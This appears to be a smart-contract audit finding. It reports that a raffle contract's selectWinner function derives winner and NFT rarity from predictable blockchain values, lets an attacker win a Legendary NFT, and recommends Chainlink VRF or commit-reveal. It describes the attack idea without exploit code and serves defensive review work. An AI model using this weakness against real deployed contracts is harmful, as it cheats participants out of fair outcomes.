The selectWinner
function in the given smart contract attempts to pick a winner from a raffle and award them an NFT with a rarity level. The randomness used to determine both the winner and the rarity of the NFT could be predicted or manipulated due to its reliance on blockchain variables and msg.sender
, potentially allowing a malicious actor to unfairly win and obtain a Legendary NFT.
The function utilizes the keccak256
hashing function applied to a combination of msg.sender
, block.timestamp
, and block.difficulty
to compute indices and rarity values. However, these sources of entropy are known to be manipulable
to some extent:
Winner Selection:
Rarity Determination:
The winnerIndex
and rarity
values are determined using the keccak256
hash function, which, although being a secure hash function, becomes predictable when fed with known or manipulable
inputs. Furthermore,we also know that the rarity
value needs to be >95
in order to mint the legendary
NFT.
A malicious actor could potentially manipulate the variables involved in the randomness generation to increase their chances of winning the raffle and obtaining a Legendary NFT. This undermines the fairness and integrity of the raffle and NFT distribution, which could in turn affect the trust and participation levels in the raffle.
Add this test function to the foundry test:
Manual review
Foundry
Employ Off-chain Randomness: Utilize an off-chain source of randomness, like Chainlink VRF (Verifiable Random Function), to generate random numbers securely.
Use Commit-Reveal Scheme: Implement a commit-reveal scheme that requires players to submit a hash of their chosen random number and reveal it later, which can then be combined to generate a random number for the raffle.
Root cause: bad RNG Impact: manipulate winner
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.